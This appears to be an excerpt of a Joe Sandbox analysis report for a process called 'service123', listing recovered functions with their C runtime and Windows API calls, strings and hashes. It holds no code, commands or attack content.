Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: c14d53b15cba9fd604bb07e6041280774de602b91545e05572161b8eacb72e7c
Instruction ID: 61fad5822d65413d7da5ae38979871c2bfb8837ec0f4764603809460f92a0d9f
Opcode Fuzzy Hash: c14d53b15cba9fd604bb07e6041280774de602b91545e05572161b8eacb72e7c
Instruction Fuzzy Hash: 4C8125B6B056008FDB04EF29C488A9AFBF5BF85304F4185ADD8959B714D731E819CF82

Function 6C2EE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 1b73a94be3f777d60fef41e7d8ce774920f6594167b13ab88d9b0906d7c5b087
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: 4251797050971A8FC710DF19C08065AB7E1BF8E309F844A5EFC98ABB59D730D94ACB96

Function 6C2EE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2EE487
WaitForSingleObject.KERNEL32 ref: 6C2EE4C8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 652ad74b9045bbcfc3db902643d745b0667e8212f447bbd52b9ef120e3e64d59
Instruction ID: fd014303e4510d7e2994f00fd6195ffa4bc6b9a6e32b5c87ae61464191da7bf8
Opcode Fuzzy Hash: 652ad74b9045bbcfc3db902643d745b0667e8212f447bbd52b9ef120e3e64d59
Instruction Fuzzy Hash: 0E516C707493068FEB10EF39C6847667BF5BB0A309F908A2CEC54A7789D771D4458BA2

Function 6C2F01F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2F0209
memcpy.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C2F022D
malloc.MSVCRT ref: 6C2F0247
memset.MSVCRT ref: 6C2F0275
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: d01d391e333110d6d19cc7e8114d256fcfccbd0b7de71b34f8b83fe0ec30a4b3
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 34118FB264530D9ED700BF68D480899F7E4EB44258F01897DDC68C7B01E731D5298E61

Function 002D8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 002D812C
GetProcAddress.KERNEL32 ref: 002D814C
GetProcAddress.KERNEL32 ref: 002D818B

Strings

msvcrt.dll, xrefs: 002D8125
___lc_codepage_func, xrefs: 002D8144
__lc_codepage, xrefs: 002D8180

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: ae50c93d214a2ec6cb354745e8357291bf05a149078cd649b4f1923499aafe9a
Instruction ID: 40c4b311ca2a555bda69a74f57598cf98644212f0d8ae6b84e84372f0844a3fa
Opcode Fuzzy Hash: ae50c93d214a2ec6cb354745e8357291bf05a149078cd649b4f1923499aafe9a
Instruction Fuzzy Hash: 2EF01DB1D652119F9B107F397D4925BBBF4AA04351F45853BD889C7300EAB4CC69CBA3

Function 6C2F9171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2F917C
GetProcAddress.KERNEL32 ref: 6C2F919C
GetProcAddress.KERNEL32 ref: 6C2F91DB

Strings

msvcrt.dll, xrefs: 6C2F9175
__lc_codepage, xrefs: 6C2F91D0
___lc_codepage_func, xrefs: 6C2F9194

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 10a8505930df55661ce48773393e25250e662a67b5b86d1d92f6895cbb4a6938
Instruction ID: 0f01f0b48787bd10f4d37996e081cc4e066b2a77d7cb262e1795562da8e01f50
Opcode Fuzzy Hash: 10a8505930df55661ce48773393e25250e662a67b5b86d1d92f6895cbb4a6938
Instruction Fuzzy Hash: D1F062B1AC521A8BEB00BF7C5A0A25BBBF4A615221F40053DDD99C7604E235C465CFA3

Function 6C2EEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D60
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: a9de0aa4360db63034d117d468102b66bf1850a207c6ec7662d1f1e2119b5c89
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: CCB01231CD933D8A85207A7C0510088A31DA62F3493845C5BCC5A73E068331E0974C62

Function 6C384890 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C38B65E), ref: 6C384913
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C38B65E), ref: 6C384955

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 9cf6dc156a06f4ed9ead8f0d02cc8090b01c55f854479077440b8bb6d8998a98
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 856106B490A705CFC714DF29C19051AFBE4EF88754F20892DE8A98BB61E731E845CF52

Function 6C380720 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C319053,00000003), ref: 6C38079D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C319053,00000003), ref: 6C3807DC

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 6993061c4a50364236a9874180bbfaf036d7bf536a87001e0cde4944ac01876e
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: A56102B450A746CFCB14DF19C19051AFBE0AF88754F20C91DE8AA8B761D731E845CF92

Function 6C382940 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C37711E), ref: 6C3829B3

Strings

basic_string::_M_create, xrefs: 6C3829CA, 6C382A6A
basic_string::basic_string, xrefs: 6C382ABC, 6C382B19
string::string, xrefs: 6C382B7E
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C382AC4, 6C382B21, 6C382B86

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: bf2c024609539f7b4f8c0b3f0e4078b6cccbb771969017aa34b627ee6ee9b84f
Instruction ID: b53e3bc44a7e2a88cf89b0011f1205d00f9ec5343a76400cbd6c8056479a76be
Opcode Fuzzy Hash: bf2c024609539f7b4f8c0b3f0e4078b6cccbb771969017aa34b627ee6ee9b84f
Instruction Fuzzy Hash: EE714FB69093508FC310DF2CD58064AFBE4BF99218F55899EE8889B715D335C945CF93

Function 6C2EEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: fd953836ff45af69b85a0f077aa9da43ecd5b4bb527c6379ee2eaba59f10a9d9
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: AD61B07560930E8FC704DF19C48065AF7E5AF8C318F848A2DFC98ABB48D730D9468B96

Function 6C2FAE10 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2FACEF), ref: 6C3B5FF0
abort.MSVCRT(?,?,?,?,?,?,6C2FAC4C,?,?,?,?,?,?,6C3B6040), ref: 6C3B5FF8
abort.MSVCRT(?,?,?,?,?,?,6C2FAC4C,?,?,?,?,?,?,6C3B6040), ref: 6C3B6000
abort.MSVCRT(?,?,?,?,?,?,6C2FAC4C,?,?,?,?,?,?,6C3B6040), ref: 6C3B6008

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9d22592dae46b97e0f22c042a499fcb0990e14f3879cb7c4a58c5b0e7b40db68
Instruction ID: 2dd1ebd0dea4ac6f1a01fa3c2228c7fb727bdb5cd8ffea0f4a3cedd2718e0770
Opcode Fuzzy Hash: 9d22592dae46b97e0f22c042a499fcb0990e14f3879cb7c4a58c5b0e7b40db68
Instruction Fuzzy Hash: 0641117168831D8FD704AF24C4816AEF7E5AF8220CF14896DD8949BF15DB32944ACFA2

Function 6C2E1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C2E1281,?,?,?,?,?,?,6C2E13AE), ref: 6C2E1057
_amsg_exit.MSVCRT ref: 6C2E1086

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 263d9fae73c92482374d6af45cefb192f4184d393b67593e6b6e12d20e2aa2af
Instruction ID: 4b7fc06ae8bbaa2c983c5221cb95f922b6ca170ba515fe04a8aba8bd55f012af
Opcode Fuzzy Hash: 263d9fae73c92482374d6af45cefb192f4184d393b67593e6b6e12d20e2aa2af
Instruction Fuzzy Hash: 4D318F703892498BDB00EF19C681B5AB7F4EB4A388F91863CED549BA41DB31C4C4DB93

Function 6C301CB0 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C301CC8
strlen.MSVCRT ref: 6C301CD2
memcpy.MSVCRT ref: 6C301CEF
setlocale.MSVCRT ref: 6C301D02
wcsftime.MSVCRT ref: 6C301D26
setlocale.MSVCRT ref: 6C301D38

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction ID: 5a0f785ea20ad3d808b90b5aa9c2ce89c7b8973b6e6a06143270a742b98d313e
Opcode Fuzzy Hash: 8c65a748b42de41f578bf91926d0288165d34402882559e46b9e4ad73c507734
Instruction Fuzzy Hash: E411B0B0609318AFC340BF69C08465AFBE4BF88644F41882DE8D987710EB799855CF92

Function 6C301A00 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C301A18
strlen.MSVCRT ref: 6C301A22
memcpy.MSVCRT ref: 6C301A3F
setlocale.MSVCRT ref: 6C301A52
strftime.MSVCRT ref: 6C301A76
setlocale.MSVCRT ref: 6C301A88

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction ID: 2cb803628478e28fd70db176ac0a6d9c234a47381131892ee16453cf298ed31c
Opcode Fuzzy Hash: 5921bce16b2b149da0e5d95dd047887597348383fbd26cb02bf93ddb50e0a5a7
Instruction Fuzzy Hash: 0311B0B1909318AFC340BF68C08475AFBE4AF84644F45882DE8C987701EB79D855CB92

Function 6C2EED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D65
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2EE2F4,?,?,?,?,?,?,00000000,00000001,6C2F008D), ref: 6C3B6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2F038F), ref: 6C3B6D7E

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: be438a145ad77f6e71c17a8a1440097a42b46e677d340bc377fb97f57be09ae5
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 3EB092318C826D85C5206AAC001039AA21D971B348F80281A896672C0A8622A0934D56

Function 6C2FDE80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C2FDEC7
LocalFree.KERNEL32 ref: 6C2FDEFB

Strings

Unknown error code, xrefs: 6C2FDF3C
basic_string: construction from null is not valid, xrefs: 6C2FDF57

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: cdc4f9ebbfb59d534d9746ae0639774b26a1dfed82abc4db9542895498fafbd8
Instruction ID: a50b9bf1d561128f308dadebeb90a76bc845dfc3b9c5b5a14fea1565ad24a303
Opcode Fuzzy Hash: cdc4f9ebbfb59d534d9746ae0639774b26a1dfed82abc4db9542895498fafbd8
